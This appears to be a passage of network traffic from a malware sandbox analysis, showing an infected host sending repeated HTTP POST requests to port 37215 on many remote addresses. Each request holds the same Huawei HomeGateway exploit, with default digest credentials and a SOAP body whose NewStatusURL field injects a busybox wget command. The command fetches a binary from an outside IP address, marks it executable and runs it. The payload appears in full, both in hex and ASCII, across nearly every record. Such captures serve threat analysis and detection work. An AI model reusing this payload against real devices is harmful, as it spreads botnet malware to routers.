                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1400192.168.2.1540668197.92.59.20037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732217073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1401192.168.2.1541520197.135.15.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732238054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1402192.168.2.1538742197.237.33.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732259035 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1403192.168.2.1545004197.210.47.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732294083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1404192.168.2.1534714197.73.229.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732326031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1405192.168.2.1557152197.19.68.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732326031 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1406192.168.2.1558982197.122.68.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732328892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1407192.168.2.1541880197.32.50.4637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732369900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1408192.168.2.1542208197.212.9.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732383013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1409192.168.2.1551736197.57.105.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732404947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 